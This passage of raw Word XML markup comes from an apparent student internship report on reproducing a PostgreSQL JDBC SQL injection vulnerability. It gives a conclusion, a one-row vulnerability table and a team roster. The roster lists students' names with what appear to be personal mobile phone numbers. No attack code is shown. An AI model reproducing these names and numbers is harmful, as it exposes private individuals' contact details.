        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学实习实训第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>组的安全人员采用科学的漏洞复现步骤于2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月18日至2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月20日对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PostgreSql sql注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个，其高危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个，中危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个,低危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个。</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4714"/>
        <w:gridCol w:w="2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95" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Hlk482954515"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>风险值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1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="17"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PostgreSQL JDBC SQL注入漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>（）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc7481"/>
      <w:bookmarkStart w:id="5" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="6" w:name="_Toc5011"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-55880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2109470" cy="1878330"/>
            <wp:effectExtent l="0" t="0" r="11430" b="127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109470" cy="1878330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc13939"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc21093"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="802"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="850" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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bookmarkStart w:id="13" w:name="_Toc3137"/>
            <w:bookmarkStart w:id="14" w:name="_Toc19764"/>
            <w:bookmarkStart w:id="15" w:name="_Toc18367"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>职务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>联系方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="850" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>组长</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>王伯雅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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hint="default" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>15503567789</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="850" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>李佳豪</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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hint="default" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>13191110713</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="850" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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hint="default" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>刘哲泽</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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hint="default" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>16650717520</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="850" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
